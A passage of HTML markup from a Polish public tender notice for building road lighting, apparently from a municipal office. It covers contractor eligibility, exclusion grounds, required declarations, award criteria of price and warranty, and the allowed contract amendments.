lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie nie wcześniej niż ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał jedną budowę oświetlenia drogowego, o wartości brutto nie mniejszej niż 30 tys. zł, oraz potwierdzi dowodami że roboty budowlane zostały wykonane należycie, w szczególności poda informację że roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. W przypadku oferty składanej wspólnie (art. 23 ustawy pzp - konsorcjum) warunek udziału w postępowaniu wystarczy, że spełni jeden z wykonawców składających ofertę wspólną. W przypadku wykazania przez Wykonawców, wartości niezbędnych do oceny spełniania warunków udziału w postępowaniu w innych walutach niż PLN, Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w BZP. Jeżeli w dniu publikacji ogłoszenia o zamówieniu, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia, przyjmuje się średni kurs publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu, w którym zostanie on opublikowany.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">Sposób wykazania przez wykonawcę spełnienia tego warunku w niniejszym postępowaniu będzie składał się z dwóch części. Na podstawie art. 25a ust 1 ustawy pzp każdy wykonawca składa do oferty oświadczenie , w którym zostaje złożona deklaracja o spełnieniu warunków udziału. W przypadku oferty wspólnej (art. 23 ustawy pzp - konsorcjum) oświadczenie składa co najmniej jeden z jej uczestników (ten wykonawca, który warunek udziału spełnia). W trakcie badania i oceny ofert, zamawiający dokona punktacji ofert nie podlegających odrzuceniu i których wykonawcy nie podlegali wykluczeniu. Następnie na podstawie art. 26 ust 2 ustawy pzp zostanie wezwany tylko jeden wykonawca (którego oferta uzyskała największą ilość punktów) do złożenia dokumentu potwierdzającego spełnienie warunków udziału w postępowaniu Dokumenty składane przez tego wykonawcę mają potwierdzać na termin ich złożenia, brak podstaw do wykluczenia i zostać złożone w terminie do 5 dni od otrzymania przez wykonawcę wezwania. Dokumenty te wszyscy wykonawcy nie muszą składać do oferty, gdyż ta czynność nie ma większego wpływu na sposób prowadzenia procedury badania i oceny ofert wskazane powyżej. W przypadku oferty wspólnej dokument potwierdzający muszą złożyć wykonawcy, którzy spełniają w/w warunki </span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust.5 pkt 1 ustawy. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu o którym mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. W przypadku oferty wspólnej (konsorcjum) dokumenty/oświadczenia składa odrębnie każdy z uczestników konsorcjum. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. Przykładowy wykaz stanowi załącznik nr 7 do siwz. Oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy. Przykłada treść oświadczenia określona została w załączniku nr 8 do siwz. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.Przykładowy wykaz stanowi załącznik nr 8 do siwz. W przypadku składania oferty wspólnej (konsorcjum) dokument/oświadczenie składa co najmniej jeden z jej uczestników, który ten warunek spełnia. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Na podstawie art. 24 ust 11 każdy wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej : www.umannopol.bip.lubelskie.pl informacji ,,z otwarcia ofert" (o której mowa w art. 86 ust. 5 ustawy pzp ), przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 zgodnie z przykładową treścią załącznika nr 3 do siwz. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Na potwierdzenie braku podstaw wykluczenia z postępowania Wykonawca składa oświadczenie dotyczące przesłanek wykluczenia z postępowania, na podstawie art.25a ust.1 ustawy pzp, zgodnie z przykładową treścią załącznika nr 3 do siwz. W przypadku konsorcjum - oferta wspólna oświadczenia składają odrębnie wszyscy wykonawcy lub podpisują je wspólnie. Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca składa oświadczenie dotyczące spełniania warunków udziału w postępowaniu, na podstawie art. 25a ust.1 ustawy pzp, zgodnie z przykładową treścią załącznika nr 4 do siwz. W przypadku konsorcjum - oferta wspólna oświadczenie składa co najmniej ten wykonawca, który spełnia warunki udziału. Wykonawca, który powołuje się na zasoby innych podmiotów (art. 22a), w celu wykazania braku istnienia wobec nich podstaw wykluczenia z postępowania składa oświadczenie zgodnie z przykładową treścią załącznika nr 3 do siwz. Wykonawca, który powołuje się na zasoby innych podmiotów (art. 22a), składa oświadczenie/deklarację podmiotu udostępniającego swoje zasoby wykonawcy składającemu ofertę - o udostępnieniu zasobów (należy w oświadczeniu wskazać jakie to są zasoby) w celu spełnienia warunków udziału w postępowaniu. Oświadczenie składa do oferty i podpisuje podmiot udostępniający swoje zasoby. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji (okres rękojmi)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zgodnie z postanowieniami art. 144 ust. 1 pkt.1 ustawy Pzp Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem podpisania aneksu zaakceptowanego przez obydwie Strony, a mianowicie:2.	Zmianę terminu realizacji przedmiotu zamówienia w następujących przypadkach:1)	spowodowanych niekorzystnymi warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności: a)	klęski żywiołowe, b)	warunki atmosferyczne uniemożliwiające prowadzenie robót, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, c)	odkrycia w trakcie robót niewypałów i niewybuchów,d)	odkrycia w trakcie robót obiektów wymagających wcześniejszej rozbiórki lub usunięcia, e)	odkrycia przedmiotu względem, którego powstanie przypuszczenie, że jest on zabytkiem, co oznaczać będzie konieczność wstrzymania robót lub takiego ich wykonania, aby zabytek nie został zniszczony, ale zabezpieczony jako przedmiot archeologiczny i miejsce jego znaleziska,f)	stwierdzenia innego usytuowania obiektów podziemnych lub podziemnych sieci uzbrojenia terenu niż wynikające z ewidencji geodezyjnej, co będzie wymagało odpowiednich zmian w opracowaniach projektowych lub sposobie wykonania robót,g)	zmiany terminu początkowego rozpoczęcia świadczenia (np. w przypadku przedłużenia procedur przetargowych) z zachowaniem jej terminu końcowego.2)	będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:a)	nieterminowe przekazanie przez Zamawiającego terenu, na którym będą prowadzone roboty,b)	wstrzymanie robót przez Zamawiającego z przyczyn nieleżących po stronie Wykonawcy, c)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,3)	z przyczyn niezależnych od Wykonawcy lub Zamawiającego, w szczególności w przypadku okoliczności wystąpienia siły wyższej lub z powodu działania osób trzecich, które to przyczyny każda ze Stron musi udokumentować,4)	opóźnienia w działaniu instytucji opiniujących, uzgadniających oraz wydających decyzje administracyjne ponad czas (termin) wynikający z przepisów prawa,5)	wejście w życie nowych przepisów, Polskich Norm po upływie terminu składania ofert, w czasie wykonywania przedmiotu zamówienia, gdy ich wprowadzenie będzie powodować wzrost pracochłonności wykonania danych opracowań lub projektów o więcej niż 5%.6)	konieczności wykonania robót nie przewidzianych w dokumentacji projektowej, ,7)	konieczności wykonania robót zamiennych, rozumianych w sposób jak niżej:1)	roboty zamienne polegają na tym, że Wykonawca zobowiązuje się do wykonania zamówienia podstawowego w sposób odmienny od określonego w umowie, 2)	roboty zamienne nie mogą spowodować zwiększenia wynagrodzenia Wykonawcy,3)	konieczność wykonania robót zamiennych zachodzi między innymi w sytuacji, gdy: a)	materiały, osprzęt lub urządzenia przewidziane do wykonania zamówienia, wskazane w dokumentacji projektowej, nie mogą być użyte przy realizacji przedmiotu zamówienia z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi lub lepszymi, b)	w trakcie wykonania przedmiotu zamówienia nastąpiła zmiana przepisów Prawa,c)	w czasie realizacji robót zmienią się warunki techniczne wykonania przedmiotu zamówienia (np. Polska Norma), d)	w trakcie realizacji przedmiotu zamówienia zastosowano lepsze materiały,e)	w trakcie realizacji przedmiotu zamówienia wystąpiła konieczność zmiany technologii ich wykonania robót budowlanych albo innych prac.Termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do wykonywania przedmiotu zamówienia w sposób należyty, nie dłużej jednak, niż o czas trwania okoliczności wymienionych w pkt. 1 powyżej.Zmiany wskazywane w pkt. 1 pkt. 6) - 7) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu zamówienia do użytkowania Zamawiającemu zgodnie z jego wymaganiami. 3.	Zmiany osobowe:1)	Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane oraz doświadczeniem zawodowym opisanym w SIWZ.2)	Zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego, dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym niż podwykonawca wskazany w zawartej umowie.3)	Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.4.	Pozostałe zmiany:1)	Zmniejszenie wynagrodzenia Wykonawcy, w przypadku obniżenia stawki podatku VAT spowodowanego zmianą ustawy o podatku od towarów i usług, o kwotę wynikającą z tej zmiany;2)	Rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia, jeżeli:a)	zrealizowanie przedmiotu umowy w całości nie będzie możliwe w terminach określonych w § 2 ust. 2 umowy,b)	zrealizowanie przedmiotu umowy w całości nie będzie możliwe z przyczyn finansowych, technicznych, albo na skutek zmiany przepisów prawnych np. p. poż., bhp, norm technicznych, decyzji organów państwa lub samorządu, podwyższenia składek na ubezpieczenie społeczne, podwyższenia minimalnego wynagrodzenia albo minimalnego wynagrodzenia 